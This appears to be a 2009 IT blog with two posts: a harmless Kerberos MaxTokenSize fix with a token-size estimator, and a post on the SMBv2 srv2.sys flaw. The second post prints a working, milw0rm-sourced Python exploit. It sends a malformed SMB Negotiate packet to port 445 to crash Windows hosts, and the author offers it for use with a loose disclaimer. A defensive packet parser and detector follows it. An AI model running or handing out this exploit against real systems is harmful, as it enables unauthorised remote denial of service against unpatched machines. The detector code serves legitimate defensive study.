Nov/09
Microsoft Kerberos Awesomeness!
Anybody who has worked on a large domain has probably run into this issue before.
When joining a machine to a Windows domain, the following error can occur:
Not enough storage is available to complete this operation.
Now now... I know what you may be thinking: "I have a 500GB hard drive, what the hell is this talking about?" Unfortunately, it is not referring to the space on your machine, or the space on the server for that matter. The error means the account's Kerberos token, which carries a SID for every group the account belongs to (directly, nested, and via SID history), is larger than the buffer Windows allocates for it. That buffer is capped by MaxTokenSize, which defaults to 12,000 bytes on the Windows versions around at the time of writing (Windows 8 and Server 2012 later raised the default to 48,000), so the symptom usually appears once an account passes a few hundred group memberships. Adding the following registry value raises the cap so the token fits:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Kerberos\Parameters]
"MaxTokenSize"=dword:0000ffff
In decimal, that value is 65,535 if you would like to enter it that way; 0xffff is the largest value Windows supports. Set it on every machine that has to handle the oversized token (the client you are joining, the domain controllers, and any member servers it will authenticate to), not just the one showing the error, then restart and you should be all set. Two caveats: Microsoft's later guidance recommends stopping at 48,000 (0xbb80) rather than 65,535, because the ticket grows by a third when it is base64-encoded into an HTTP Authorization header and values above that break Kerberos to IIS and other HTTP services; and this is a workaround, the real fix is trimming the account's group memberships and SID history. No more errors.
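To see whether a given account is actually near the limit before touching the registry, here is an added example (my code, not from the original post) that applies Microsoft's token-size estimate from KB 327825, TokenSize = 1200 + 40d + 8s, picks the MaxTokenSize to configure, and renders the same .reg snippet as above. The group counts in the demo are constructed, not taken from a real domain.

```python
"""Estimate a user's Kerberos token size and decide whether MaxTokenSize must be raised.

Formula from Microsoft KB 327825:  TokenSize = 1200 + 40*d + 8*s
  d = domain local groups + universal groups outside the account domain + SID-history entries
  s = global security groups + universal groups inside the account domain
"""

TICKET_OVERHEAD = 1200          # fixed per-ticket overhead used by KB 327825
DEFAULT_MAX_TOKEN_SIZE = 12000  # default before Windows 8 / Server 2012 (which raised it to 48000)
HTTP_SAFE_MAX = 48000           # Microsoft's recommended ceiling: base64 in an HTTP header adds ~1/3
ABSOLUTE_MAX = 65535            # 0xffff, the largest value Windows supports

REG_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Kerberos\Parameters"


def estimate_token_size(domain_local, universal_outside, sid_history, global_groups, universal_inside):
    """KB 327825 estimate in bytes for an account with the given group counts."""
    d = domain_local + universal_outside + sid_history
    s = global_groups + universal_inside
    return TICKET_OVERHEAD + 40 * d + 8 * s


def recommend_max_token_size(token_size, current_max=DEFAULT_MAX_TOKEN_SIZE):
    """Return the MaxTokenSize to configure, or None when the current cap already fits.

    Raises ValueError when even 65,535 cannot hold the token: at that point the only
    fix is trimming group memberships / SID history, not the registry.
    """
    if token_size <= current_max:
        return None
    if token_size <= HTTP_SAFE_MAX:
        return HTTP_SAFE_MAX
    if token_size <= ABSOLUTE_MAX:
        return ABSOLUTE_MAX
    raise ValueError("token of %d bytes exceeds the %d-byte ceiling; reduce group memberships"
                     % (token_size, ABSOLUTE_MAX))


def reg_file(max_token_size):
    """Render a .reg file applying the value, in the same shape as the snippet in the post."""
    if not 0 < max_token_size <= ABSOLUTE_MAX:
        raise ValueError("MaxTokenSize must be between 1 and 65535")
    return (
        "Windows Registry Editor Version 5.00\r\n\r\n"
        "[%s]\r\n" % REG_KEY
        + '"MaxTokenSize"=dword:%08x\r\n' % max_token_size
    )


if __name__ == "__main__":
    # Constructed sample account: 200 domain local groups, 50 universal groups from a trusted
    # domain, 10 SID-history entries, 300 global groups, 40 universal groups in its own domain.
    size = estimate_token_size(200, 50, 10, 300, 40)
    print("estimated token size: %d bytes" % size)
    new_max = recommend_max_token_size(size)
    if new_max is None:
        print("fits within the default MaxTokenSize; look elsewhere for the error")
    else:
        print(reg_file(new_max))
```

The sample account estimates to 14,320 bytes, above the 12,000-byte default, so the script emits a .reg file setting 48,000 (dword:0000bb80); pass 65535 to reg_file() to get the dword:0000ffff line from the post.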
Sep/09
Microsoft SMB2 Vulnerability update.
Microsoft has posted an update with links to a "Microsoft Fix it" package that disables SMBv2 until a proper patch is released (the patch later shipped as bulletin MS09-050). Read it at http://blogs.technet.com/srd/archive/2009/09/18/update-on-the-smb-vulnerability.aspx.
For those of you who do not know what I'm talking about: by sending a single specially crafted SMB Negotiate Protocol request to TCP port 445, an unauthenticated attacker can trigger a bug in the SMBv2 kernel driver, srv2.sys (SMBv2 being the second revision of the protocol that Microsoft File and Print Sharing relies on), and cause the system to blue screen and reboot. Disabling SMBv2, or blocking 445 at the perimeter, removes the exposure until the patch is applied.
I have tested this myself and it has worked every time... sorry Chaim.
Below is the code that I have been using to actually exploit this vulnerability. Use with caution and don't be malicious. I take no responsibility for your shenanigans.
This code came from milw0rm.
#!/usr/bin/env python3
# Sends one malformed SMB_COM_NEGOTIATE request to TCP/445 and drops the connection.
import socket
import sys

# Target from the command line; falls back to the placeholder used in the original.
hosty = sys.argv[1] if len(sys.argv) > 1 else "ip.of.target.machine"
print(hosty)
host = (hosty, 445)
buff = (
    b"\x00\x00\x00\x90"  # NetBIOS session message, 0x90 = 144 bytes of SMB follow
    b"\xff\x53\x4d\x42"  # SMB header: protocol id "\xffSMB"
    b"\x72\x00\x00\x00"  # Command 0x72 (SMB_COM_NEGOTIATE) + first 3 bytes of NT status
    b"\x00\x18\x53\xc8"  # last status byte, Flags 0x18, Flags2 0xc853 (little-endian)
    b"\x00\x26"          # Process ID High: normal value should be "\x00\x00"
    b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"  # signature, reserved, TID 0xffff, PID 0xfeff
    b"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"  # UID, MID, WordCount 0, ByteCount 0x6d, dialects...
    b"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
    b"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
    b"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
    b"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
    b"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
    b"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
    b"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
    b"\x30\x30\x32\x00"   # dialects: "PC NETWORK PROGRAM 1.0", "LANMAN1.0", "Windows for Workgroups 3.1a",
)                        # "LM1.2X002", "LANMAN2.1", "NT LM 0.12", "SMB 2.002"
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.settimeout(1)
    s.connect(host)
    s.sendall(buff)
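For the defensive side of this, here is an added example (my code, not from milw0rm or Microsoft) that decodes an SMB1 Negotiate Protocol request according to the [MS-CIFS] header layout and flags the combination the packet above relies on: a non-zero Process ID High together with the "SMB 2.002" dialect, which is what gets an SMB2-capable server to hand the request to srv2.sys. Both sample packets are constructed by the builder in the block; the "poc" one reproduces the field values of the packet above (the "\x00\x26" Process ID High reads as 0x2600 little-endian). The builder is there so the parser can be exercised offline; the interesting part is the parser and the check, which you can point at a pcap payload.

```python
"""Decode an SMB1 SMB_COM_NEGOTIATE request and flag the shape of the PoC packet above."""
import struct

# SMB1 header (32 bytes, little-endian): protocol id, command, NT status, flags, flags2,
# PIDHigh, security signature, reserved, TID, PIDLow, UID, MID.
SMB_HEADER = struct.Struct("<4sBIBHH8sHHHHH")
SMB_COM_NEGOTIATE = 0x72
SMB2_DIALECT = "SMB 2.002"  # offering this is what routes the request to the SMB2 driver

# Dialect list sent by the PoC (the same list an ordinary Windows client of the era sends).
POC_DIALECTS = ["PC NETWORK PROGRAM 1.0", "LANMAN1.0", "Windows for Workgroups 3.1a",
                "LM1.2X002", "LANMAN2.1", "NT LM 0.12", SMB2_DIALECT]


def build_smb1_negotiate(dialects, pid_high=0, flags=0x18, flags2=0xc853, tid=0xffff, pid=0xfeff):
    """NetBIOS session message + SMB1 header + Negotiate body. Defaults mirror the PoC header."""
    data = b"".join(b"\x02" + d.encode("ascii") + b"\x00" for d in dialects)
    header = SMB_HEADER.pack(b"\xffSMB", SMB_COM_NEGOTIATE, 0, flags, flags2, pid_high,
                             b"\x00" * 8, 0, tid, pid, 0, 0)
    body = header + b"\x00" + struct.pack("<H", len(data)) + data  # WordCount=0, ByteCount, dialects
    return b"\x00" + len(body).to_bytes(3, "big") + body            # NetBIOS: type 0, 3-byte length


def parse_smb1_negotiate(packet):
    """Return header fields and the dialect list, raising ValueError on a malformed packet."""
    if len(packet) < 4 or packet[0] != 0:
        raise ValueError("not a NetBIOS session message")
    length = int.from_bytes(packet[1:4], "big")
    body = packet[4:4 + length]
    if len(body) != length or length < 35:
        raise ValueError("truncated: NetBIOS length %d, got %d bytes" % (length, len(body)))
    (proto, cmd, _status, flags, flags2, pid_high, _sig, _rsvd,
     tid, pid, uid, mid) = SMB_HEADER.unpack_from(body)
    if proto != b"\xffSMB":
        raise ValueError("not an SMB1 header")
    if cmd != SMB_COM_NEGOTIATE:
        raise ValueError("command 0x%02x is not SMB_COM_NEGOTIATE" % cmd)
    word_count = body[32]
    byte_count = struct.unpack_from("<H", body, 33 + 2 * word_count)[0]
    data = body[35 + 2 * word_count:]
    if len(data) != byte_count:
        raise ValueError("ByteCount %d does not match %d data bytes" % (byte_count, len(data)))
    dialects = []
    pos = 0
    while pos < len(data):
        if data[pos] != 0x02:
            raise ValueError("dialect entry at offset %d lacks the 0x02 buffer-format byte" % pos)
        end = data.index(b"\x00", pos + 1)
        dialects.append(data[pos + 1:end].decode("ascii"))
        pos = end + 1
    return {"flags": flags, "flags2": flags2, "pid_high": pid_high, "tid": tid,
            "pid": pid, "uid": uid, "mid": mid, "dialects": dialects}


def looks_like_poc(fields):
    """True when PIDHigh is non-zero (normal value is 0) and the request still offers SMB 2.002."""
    return fields["pid_high"] != 0 and SMB2_DIALECT in fields["dialects"]


if __name__ == "__main__":
    normal = build_smb1_negotiate(POC_DIALECTS)                # constructed: a healthy client request
    poc = build_smb1_negotiate(POC_DIALECTS, pid_high=0x2600)  # constructed: the field values of the PoC
    for name, pkt in (("normal", normal), ("poc", poc)):
        f = parse_smb1_negotiate(pkt)
        print("%-6s pid_high=0x%04x dialects=%d suspicious=%s"
              % (name, f["pid_high"], len(f["dialects"]), looks_like_poc(f)))
```

The "poc" packet the builder produces is byte-for-byte the buffer in the script above (148 bytes, NetBIOS length 0x90, ByteCount 0x6d), and only it trips looks_like_poc(); the same header with PIDHigh cleared, or a non-zero PIDHigh without the SMB2 dialect, does not.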